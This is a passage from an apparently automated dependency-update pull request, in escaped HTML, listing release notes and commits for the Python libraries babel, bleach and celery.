cleanup by \u003ca href=\"https://github.com/akx\"\u003e\u003ccode\u003e@​akx\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/python-babel/babel/pull/1172\"\u003epython-babel/babel#1172\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd \u003ccode\u003eMessage.python_brace_format\u003c/code\u003e by \u003ca href=\"https://github.com/tomasr8\"\u003e\u003ccode\u003e@​tomasr8\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/python-babel/babel/pull/1169\"\u003epython-babel/babel#1169\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eImport \u003ccode\u003eLiteral\u003c/code\u003e from the typing module by \u003ca href=\"https://github.com/tomasr8\"\u003e\u003ccode\u003e@​tomasr8\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/python-babel/babel/pull/1175\"\u003epython-babel/babel#1175\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ePrefer LC_MONETARY when formatting currencies by \u003ca href=\"https://github.com/akx\"\u003e\u003ccode\u003e@​akx\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/python-babel/babel/pull/1173\"\u003epython-babel/babel#1173\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix dates formatting \u003ccode\u003eY\u003c/code\u003e, \u003ccode\u003ew\u003c/code\u003e and \u003ccode\u003eW\u003c/code\u003e symbols for week-numbering by \u003ca href=\"https://github.com/jun66j5\"\u003e\u003ccode\u003e@​jun66j5\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/python-babel/babel/pull/1179\"\u003epython-babel/babel#1179\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eIncrease test coverage of the \u003ccode\u003epython_format\u003c/code\u003e checker by \u003ca href=\"https://github.com/tomasr8\"\u003e\u003ccode\u003e@​tomasr8\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/python-babel/babel/pull/1176\"\u003epython-babel/babel#1176\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ePrepare for 2.17.0 by \u003ca href=\"https://github.com/akx\"\u003e\u003ccode\u003e@​akx\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/python-babel/babel/pull/1182\"\u003epython-babel/babel#1182\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Dunedan\"\u003e\u003ccode\u003e@​Dunedan\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/python-babel/babel/pull/1105\"\u003epython-babel/babel#1105\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/python-babel/babel/blob/master/CHANGES.rst\"\u003ebabel's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eVersion 2.17.0\u003c/h2\u003e\n\u003cp\u003eHappy 2025! This release is being made from FOSDEM 2025, in Brussels, Belgium.\u003c/p\u003e\n\u003cp\u003eThank you to all contributors, new and old,\nand here's to another great year of internationalization and localization!\u003c/p\u003e\n\u003cp\u003eFeatures\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e\n* CLDR: Babel now uses CLDR 46, by @tomasr8 in :gh:`1145`\n* Dates: Allow specifying an explicit format in parse_date/parse_time by @tomasr8 in :gh:`1131`\n* Dates: More alternate characters are now supported by `format_skeleton`. By @tomasr8 in :gh:`1122`\n* Dates: Support short and narrow formats for format_timedelta when using `add_direction`, by @akx in :gh:`1163`\n* Messages: .po files now enclose white spaces in filenames like GNU gettext does. By @Dunedan in :gh:`1105`, and @tomasr8 in :gh:`1120`\n* Messages: Initial support for `Message.python_brace_format`, by @tomasr8 in :gh:`1169`\n* Numbers: LC_MONETARY is now preferred when formatting currencies, by @akx in :gh:`1173`\n\u003cp\u003eBugfixes\u003cbr /\u003e\n\u003c/code\u003e\u003c/pre\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eDates: Make seconds optional in \u003ccode\u003eparse_time\u003c/code\u003e time formats by \u003ca href=\"https://github.com/tomasr8\"\u003e\u003ccode\u003e@​tomasr8\u003c/code\u003e\u003c/a\u003e in :gh:\u003ccode\u003e1141\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eDates: Replace \u003ccode\u003estr.index\u003c/code\u003e with \u003ccode\u003estr.find\u003c/code\u003e by \u003ca href=\"https://github.com/tomasr8\"\u003e\u003ccode\u003e@​tomasr8\u003c/code\u003e\u003c/a\u003e in :gh:\u003ccode\u003e1130\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eDates: Strip extra leading slashes in \u003ccode\u003e/etc/localtime\u003c/code\u003e by \u003ca href=\"https://github.com/akx\"\u003e\u003ccode\u003e@​akx\u003c/code\u003e\u003c/a\u003e in :gh:\u003ccode\u003e1165\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eDates: Week numbering and formatting of dates with week numbers was repaired by \u003ca href=\"https://github.com/jun66j5\"\u003e\u003ccode\u003e@​jun66j5\u003c/code\u003e\u003c/a\u003e in :gh:\u003ccode\u003e1179\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eGeneral: Improve handling for \u003ccode\u003elocale=None\u003c/code\u003e by \u003ca href=\"https://github.com/akx\"\u003e\u003ccode\u003e@​akx\u003c/code\u003e\u003c/a\u003e in :gh:\u003ccode\u003e1164\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eGeneral: Remove redundant assignment in \u003ccode\u003eCatalog.__setitem__\u003c/code\u003e by \u003ca href=\"https://github.com/tomasr8\"\u003e\u003ccode\u003e@​tomasr8\u003c/code\u003e\u003c/a\u003e in :gh:\u003ccode\u003e1167\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eMessages: Fix extracted lineno with nested calls, by \u003ca href=\"https://github.com/dylankiss\"\u003e\u003ccode\u003e@​dylankiss\u003c/code\u003e\u003c/a\u003e in :gh:\u003ccode\u003e1126\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eMessages: Fix of list index out of range when translations is empty, by \u003ca href=\"https://github.com/gabe-sherman\"\u003e\u003ccode\u003e@​gabe-sherman\u003c/code\u003e\u003c/a\u003e in :gh:\u003ccode\u003e1135\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eMessages: Fix the way obsolete messages are stored by \u003ca href=\"https://github.com/tomasr8\"\u003e\u003ccode\u003e@​tomasr8\u003c/code\u003e\u003c/a\u003e in :gh:\u003ccode\u003e1132\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eMessages: Simplify \u003ccode\u003eread_mo\u003c/code\u003e logic regarding \u003ccode\u003ecatalog.charset\u003c/code\u003e by \u003ca href=\"https://github.com/tomasr8\"\u003e\u003ccode\u003e@​tomasr8\u003c/code\u003e\u003c/a\u003e in :gh:\u003ccode\u003e1148\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eMessages: Use the first matching method \u0026amp; options, rather than first matching method \u0026amp; last options, by \u003ca href=\"https://github.com/jpmckinney\"\u003e\u003ccode\u003e@​jpmckinney\u003c/code\u003e\u003c/a\u003e in :gh:\u003ccode\u003e1121\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eDeprecation and compatibility\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e\n* Dates: Fix deprecation warnings for `datetime.utcnow()` by @tomasr8 in :gh:`1119`\n* Docs: Adjust docs/conf.py to add compatibility with sphinx 8 by @hrnciar in :gh:`1155`\n* General: Import `Literal` from the typing module by @tomasr8 in :gh:`1175`\n* General: Replace `OrderedDict` with just `dict` by @tomasr8 in :gh:`1149`\n* Messages: Mark `wraptext` deprecated; use `TextWrapper` directly in `write_po` by @akx in :gh:`1140`\n\u003cp\u003eInfrastructure\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e\n* Add tzdata as dev dependency and sync with tox.ini by @wandrew004 in :gh:`1159`\n* Duplicate test code was deleted by @mattdiaz007 in :gh:`1138`\n* Increase test coverage of the `python_format` checker by @tomasr8 in :gh:`1176`\n* Small cleanups by @akx in :gh:`1160`, :gh:`1166`, :gh:`1170` and :gh:`1172`\n\u0026amp;lt;/tr\u0026amp;gt;\u0026amp;lt;/table\u0026amp;gt; \n\u0026lt;/code\u0026gt;\u0026lt;/pre\u0026gt;\n\u0026lt;/blockquote\u0026gt;\n\u0026lt;p\u0026gt;... (truncated)\u0026lt;/p\u0026gt;\n\u0026lt;/details\u0026gt;\n\u0026lt;details\u0026gt;\n\u0026lt;summary\u0026gt;Commits\u0026lt;/summary\u0026gt;\n\n\u0026lt;ul\u0026gt;\n\u0026lt;li\u0026gt;\u0026lt;a href=\u0026quot;https://github.com/python-babel/babel/commit/b50a1d2186c20f3359f7e10853d2b2225a46ed40\u0026quot;\u0026gt;\u0026lt;code\u0026gt;b50a1d2\u0026lt;/code\u0026gt;\u0026lt;/a\u0026gt; Prepare for 2.17.0 (\u0026lt;a href=\u0026quot;https://redirect.github.com/python-babel/babel/issues/1182\u0026quot;\u0026gt;#1182\u0026lt;/a\u0026gt;)\u0026lt;/li\u0026gt;\n\u0026lt;li\u0026gt;\u0026lt;a href=\u0026quot;https://github.com/python-babel/babel/commit/5f117b2689573aa98acc8a47108c49b99f4d1394\u0026quot;\u0026gt;\u0026lt;code\u0026gt;5f117b2\u0026lt;/code\u0026gt;\u0026lt;/a\u0026gt; Increase test coverage of the \u0026lt;code\u0026gt;python_format\u0026lt;/code\u0026gt; checker (\u0026lt;a href=\u0026quot;https://redirect.github.com/python-babel/babel/issues/1176\u0026quot;\u0026gt;#1176\u0026lt;/a\u0026gt;)\u0026lt;/li\u0026gt;\n\u0026lt;li\u0026gt;\u0026lt;a href=\u0026quot;https://github.com/python-babel/babel/commit/363ad7531fb5dcdc3e9844573592b0b44afb914b\u0026quot;\u0026gt;\u0026lt;code\u0026gt;363ad75\u0026lt;/code\u0026gt;\u0026lt;/a\u0026gt; Fix dates formatting \u0026lt;code\u0026gt;Y\u0026lt;/code\u0026gt;, \u0026lt;code\u0026gt;w\u0026lt;/code\u0026gt; and \u0026lt;code\u0026gt;W\u0026lt;/code\u0026gt; symbols for week-numbering (\u0026lt;a href=\u0026quot;https://redirect.github.com/python-babel/babel/issues/1179\u0026quot;\u0026gt;#1179\u0026lt;/a\u0026gt;)\u0026lt;/li\u0026gt;\n\u0026lt;li\u0026gt;\u0026lt;a href=\u0026quot;https://github.com/python-babel/babel/commit/e9c3ef8d0de3080ca59f7f8dbabf9b52983adc7d\u0026quot;\u0026gt;\u0026lt;code\u0026gt;e9c3ef8\u0026lt;/code\u0026gt;\u0026lt;/a\u0026gt; Merge pull request \u0026lt;a href=\u0026quot;https://redirect.github.com/python-babel/babel/issues/1173\u0026quot;\u0026gt;#1173\u0026lt;/a\u0026gt; from python-babel/lc-monetary-2\u0026lt;/li\u0026gt;\n\u0026lt;li\u0026gt;\u0026lt;a href=\u0026quot;https://github.com/python-babel/babel/commit/56ef7c7f578a904917464c187e399abb762bd5e3\u0026quot;\u0026gt;\u0026lt;code\u0026gt;56ef7c7\u0026lt;/code\u0026gt;\u0026lt;/a\u0026gt; Prefer LC_MONETARY when formatting currency\u0026lt;/li\u0026gt;\n\u0026lt;li\u0026gt;\u0026lt;a href=\u0026quot;https://github.com/python-babel/babel/commit/aee6d698b541dc50439280d7e093092cc0d4b832\u0026quot;\u0026gt;\u0026lt;code\u0026gt;aee6d69\u0026lt;/code\u0026gt;\u0026lt;/a\u0026gt; \u0026lt;code\u0026gt;default_locale\u0026lt;/code\u0026gt;: support multiple keys\u0026lt;/li\u0026gt;\n\u0026lt;li\u0026gt;\u0026lt;a href=\u0026quot;https://github.com/python-babel/babel/commit/2d8a808864d1aae5d3d02d4f95917c79740c5d35\u0026quot;\u0026gt;\u0026lt;code\u0026gt;2d8a808\u0026lt;/code\u0026gt;\u0026lt;/a\u0026gt; Import \u0026lt;code\u0026gt;Literal\u0026lt;/code\u0026gt; \u0026amp;amp; \u0026lt;code\u0026gt;TypedDict\u0026lt;/code\u0026gt; from the typing module (\u0026lt;a href=\u0026quot;https://redirect.github.com/python-babel/babel/issues/1175\u0026quot;\u0026gt;#1175\u0026lt;/a\u0026gt;)\u0026lt;/li\u0026gt;\n\u0026lt;li\u0026gt;\u0026lt;a href=\u0026quot;https://github.com/python-babel/babel/commit/98b9562c05e5276038c27ec12c12f3e92dc027b6\u0026quot;\u0026gt;\u0026lt;code\u0026gt;98b9562\u0026lt;/code\u0026gt;\u0026lt;/a\u0026gt; Add basic support for \u0026lt;code\u0026gt;Message.python_brace_format\u0026lt;/code\u0026gt; (\u0026lt;a href=\u0026quot;https://redirect.github.com/python-babel/babel/issues/1169\u0026quot;\u0026gt;#1169\u0026lt;/a\u0026gt;)\u0026lt;/li\u0026gt;\n\u0026lt;li\u0026gt;\u0026lt;a href=\u0026quot;https://github.com/python-babel/babel/commit/0c1091c9de9543e30bc4b845eb10b5bf84516d7b\u0026quot;\u0026gt;\u0026lt;code\u0026gt;0c1091c\u0026lt;/code\u0026gt;\u0026lt;/a\u0026gt; Small test cleanup (\u0026lt;a href=\u0026quot;https://redirect.github.com/python-babel/babel/issues/1172\u0026quot;\u0026gt;#1172\u0026lt;/a\u0026gt;)\u0026lt;/li\u0026gt;\n\u0026lt;li\u0026gt;\u0026lt;a href=\u0026quot;https://github.com/python-babel/babel/commit/db4879136a7fbcef475f26b75dbdd65d0ce488f9\u0026quot;\u0026gt;\u0026lt;code\u0026gt;db48791\u0026lt;/code\u0026gt;\u0026lt;/a\u0026gt; Merge pull request \u0026lt;a href=\u0026quot;https://redirect.github.com/python-babel/babel/issues/1170\u0026quot;\u0026gt;#1170\u0026lt;/a\u0026gt; from python-babel/small-cleanup\u0026lt;/li\u0026gt;\n\u0026lt;li\u0026gt;Additional commits viewable in \u0026lt;a href=\u0026quot;https://github.com/python-babel/babel/compare/2.0...v2.17.0\u0026quot;\u0026gt;compare view\u0026lt;/a\u0026gt;\u0026lt;/li\u0026gt;\n\u0026lt;/ul\u0026gt;\n\u0026lt;/details\u0026gt;\n\n\u0026lt;br /\u0026gt;\n\u003c/code\u003e\u003c/pre\u003e\n\nUpdates `bleach` from 1.4.1 to 6.2.0\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/mozilla/bleach/blob/main/CHANGES\"\u003ebleach's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eVersion 6.2.0 (October 29th, 2024)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBackwards incompatible changes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eDropped support for Python 3.8. (\u003ca href=\"https://redirect.github.com/mozilla/bleach/issues/737\"\u003e#737\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eSecurity fixes\u003c/strong\u003e\u003c/p\u003e\n\u003cp\u003eNone\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eBug fixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdd support for Python 3.13. (\u003ca href=\"https://redirect.github.com/mozilla/bleach/issues/736\"\u003e#736\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eRemove six depdenncy. (\u003ca href=\"https://redirect.github.com/mozilla/bleach/issues/618\"\u003e#618\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eUpdate known-good versions for tinycss2. (\u003ca href=\"https://redirect.github.com/mozilla/bleach/issues/732\"\u003e#732\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix additional \u0026lt; followed by characters and EOF issues. (\u003ca href=\"https://redirect.github.com/mozilla/bleach/issues/728\"\u003e#728\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eVersion 6.1.0 (October 6th, 2023)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBackwards incompatible changes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eDropped support for Python 3.7. (\u003ca href=\"https://redirect.github.com/mozilla/bleach/issues/709\"\u003e#709\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eSecurity fixes\u003c/strong\u003e\u003c/p\u003e\n\u003cp\u003eNone\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eBug fixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdd support for Python 3.12. (\u003ca href=\"https://redirect.github.com/mozilla/bleach/issues/710\"\u003e#710\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix linkify with arrays in querystring (\u003ca href=\"https://redirect.github.com/mozilla/bleach/issues/436\"\u003e#436\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eHandle more cases with \u0026lt; followed by character data (\u003ca href=\"https://redirect.github.com/mozilla/bleach/issues/705\"\u003e#705\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix entities inside a tags in linkification (\u003ca href=\"https://redirect.github.com/mozilla/bleach/issues/704\"\u003e#704\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eUpdate cap for tinycss2 to \u0026lt;1.3 (\u003ca href=\"https://redirect.github.com/mozilla/bleach/issues/702\"\u003e#702\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eUpdated Sphinx requirement\u003c/li\u003e\n\u003cli\u003eAdd dependabot for github actions and update github actions\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eVersion 6.0.0 (January 23rd, 2023)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBackwards incompatible changes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ccode\u003ebleach.clean\u003c/code\u003e, \u003ccode\u003ebleach.sanitizer.Cleaner\u003c/code\u003e,\n\u003ccode\u003ebleach.html5lib_shim.BleachHTMLParser\u003c/code\u003e: the \u003ccode\u003etags\u003c/code\u003e and \u003ccode\u003eprotocols\u003c/code\u003e\narguments were changed from lists to sets.\u003c/p\u003e\n\u003cp\u003eOld pre-6.0.0:\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mozilla/bleach/commit/73871d766de1e33a296eeb4f9faf2451f28bee39\"\u003e\u003ccode\u003e73871d7\u003c/code\u003e\u003c/a\u003e Prep for a 6.2.0 release\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mozilla/bleach/commit/156c5898b3b20e4a582b4a366c18355ecad477cf\"\u003e\u003ccode\u003e156c589\u003c/code\u003e\u003c/a\u003e Remove six dependency from html5lib (\u003ca href=\"https://redirect.github.com/mozilla/bleach/issues/618\"\u003e#618\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mozilla/bleach/commit/5a4790716e8b976a838327593baf6c3b9f95612f\"\u003e\u003ccode\u003e5a47907\u003c/code\u003e\u003c/a\u003e Drop six as a requirement; add six_shim.py (\u003ca href=\"https://redirect.github.com/mozilla/bleach/issues/618\"\u003e#618\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mozilla/bleach/commit/6a2ec5ca371cb666fbd843f14ecf1e93e8f7ea87\"\u003e\u003ccode\u003e6a2ec5c\u003c/code\u003e\u003c/a\u003e Update known-good versions of tinycss2 (\u003ca href=\"https://redirect.github.com/mozilla/bleach/issues/732\"\u003e#732\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mozilla/bleach/commit/32efc2656bbfb825637fa6a435af11181664fcdf\"\u003e\u003ccode\u003e32efc26\u003c/code\u003e\u003c/a\u003e Fix additional \u0026lt; followed by characters and EOF issues (\u003ca href=\"https://redirect.github.com/mozilla/bleach/issues/728\"\u003e#728\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mozilla/bleach/commit/648a97d0884ccddf8a7a9887adc83d32974688dc\"\u003e\u003ccode\u003e648a97d\u003c/code\u003e\u003c/a\u003e Add support for Python 3.13 (\u003ca href=\"https://redirect.github.com/mozilla/bleach/issues/736\"\u003e#736\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mozilla/bleach/commit/d1e40ed3d9ee7d593de2a534a81df677baf145c1\"\u003e\u003ccode\u003ed1e40ed\u003c/code\u003e\u003c/a\u003e Drop support for Python 3.8 (\u003ca href=\"https://redirect.github.com/mozilla/bleach/issues/737\"\u003e#737\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mozilla/bleach/commit/4bc1bff36841c04152525b8e57fd3740f34ec796\"\u003e\u003ccode\u003e4bc1bff\u003c/code\u003e\u003c/a\u003e Update dev requirements\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mozilla/bleach/commit/fcbe8f7fb144f3e65cbf00a464433558c80badec\"\u003e\u003ccode\u003efcbe8f7\u003c/code\u003e\u003c/a\u003e Update dev dependencies\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mozilla/bleach/commit/f8fb8482687df63d158d6eccfa2a8153ab467367\"\u003e\u003ccode\u003ef8fb848\u003c/code\u003e\u003c/a\u003e Bump actions/cache from 3 to 4\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/mozilla/bleach/compare/v1.4.1...v6.2.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `celery` from 3.1.18 to 5.5.3\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/celery/celery/releases\"\u003ecelery's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev5.5.3\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003emake the tests run on python 3.13 for gcs backend by \u003ca href=\"https://github.com/auvipy\"\u003e\u003ccode\u003e@​auvipy\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9677\"\u003ecelery/celery#9677\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdded DeepWiki to README by \u003ca href=\"https://github.com/Nusnus\"\u003e\u003ccode\u003e@​Nusnus\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9683\"\u003ecelery/celery#9683\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eLimit redis to \u0026lt;=v5.2.1 to match Kombu by \u003ca href=\"https://github.com/Nusnus\"\u003e\u003ccode\u003e@​Nusnus\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9693\"\u003ecelery/celery#9693\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUse EX_OK instead of literal zero by \u003ca href=\"https://github.com/Nusnus\"\u003e\u003ccode\u003e@​Nusnus\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9684\"\u003ecelery/celery#9684\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMake wheel metadata reproducible by \u003ca href=\"https://github.com/cjwatson\"\u003e\u003ccode\u003e@​cjwatson\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9687\"\u003ecelery/celery#9687\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003elet celery install from kombu dependencies for better align by \u003ca href=\"https://github.com/auvipy\"\u003e\u003ccode\u003e@​auvipy\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9696\"\u003ecelery/celery#9696\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix stamping documentation to clarify stamped_headers key is optional in visitor methods by \u003ca href=\"https://github.com/Nusnus\"\u003e\u003ccode\u003e@​Nusnus\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9697\"\u003ecelery/celery#9697\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eSupport apply_async without queue argument on quorum queues by \u003ca href=\"https://github.com/bityob\"\u003e\u003ccode\u003e@​bityob\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9686\"\u003ecelery/celery#9686\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUpdated rabbitmq doc about using quorum queues with task routes by \u003ca href=\"https://github.com/bityob\"\u003e\u003ccode\u003e@​bityob\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9707\"\u003ecelery/celery#9707\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd: Dumper Unit Test by \u003ca href=\"https://github.com/yiyu0x\"\u003e\u003ccode\u003e@​yiyu0x\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9711\"\u003ecelery/celery#9711\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd unit test for event.group_from by \u003ca href=\"https://github.com/rogerforlife\"\u003e\u003ccode\u003e@​rogerforlife\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9709\"\u003ecelery/celery#9709\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003erefactor: add beat_cron_starting_deadline documentation warning by \u003ca href=\"https://github.com/alirafiei75\"\u003e\u003ccode\u003e@​alirafiei75\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9712\"\u003ecelery/celery#9712\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix: resolve issue \u003ca href=\"https://redirect.github.com/celery/celery/issues/9569\"\u003e#9569\u003c/a\u003e by supporting distinct broker transport options for workers by \u003ca href=\"https://github.com/yiyu0x\"\u003e\u003ccode\u003e@​yiyu0x\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9695\"\u003ecelery/celery#9695\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFixes issue with retry callback arguments in DelayedDelivery by \u003ca href=\"https://github.com/maccinza\"\u003e\u003ccode\u003e@​maccinza\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9708\"\u003ecelery/celery#9708\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eget_exchange-unit-test by \u003ca href=\"https://github.com/rogerforlife\"\u003e\u003ccode\u003e@​rogerforlife\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9710\"\u003ecelery/celery#9710\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eISSUE-9704: Update documentation of result_expires, filesystem backend is supported by \u003ca href=\"https://github.com/MattiasDC\"\u003e\u003ccode\u003e@​MattiasDC\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9716\"\u003ecelery/celery#9716\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eupdate to blacksmith ubuntu 24.04 by \u003ca href=\"https://github.com/auvipy\"\u003e\u003ccode\u003e@​auvipy\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9717\"\u003ecelery/celery#9717\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdded unit tests for celery.utils.iso8601 by \u003ca href=\"https://github.com/jaiganeshs21\"\u003e\u003ccode\u003e@​jaiganeshs21\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9725\"\u003ecelery/celery#9725\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUpdate introduction.rst docs by \u003ca href=\"https://github.com/auvipy\"\u003e\u003ccode\u003e@​auvipy\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9728\"\u003ecelery/celery#9728\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ePrepare for release: v5.5.3 by \u003ca href=\"https://github.com/Nusnus\"\u003e\u003ccode\u003e@​Nusnus\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/celery/celery/pull/9732\"\u003ecelery/celery#9732\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/bityob\"\u003e\u003ccode\u003e@​bityob\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca 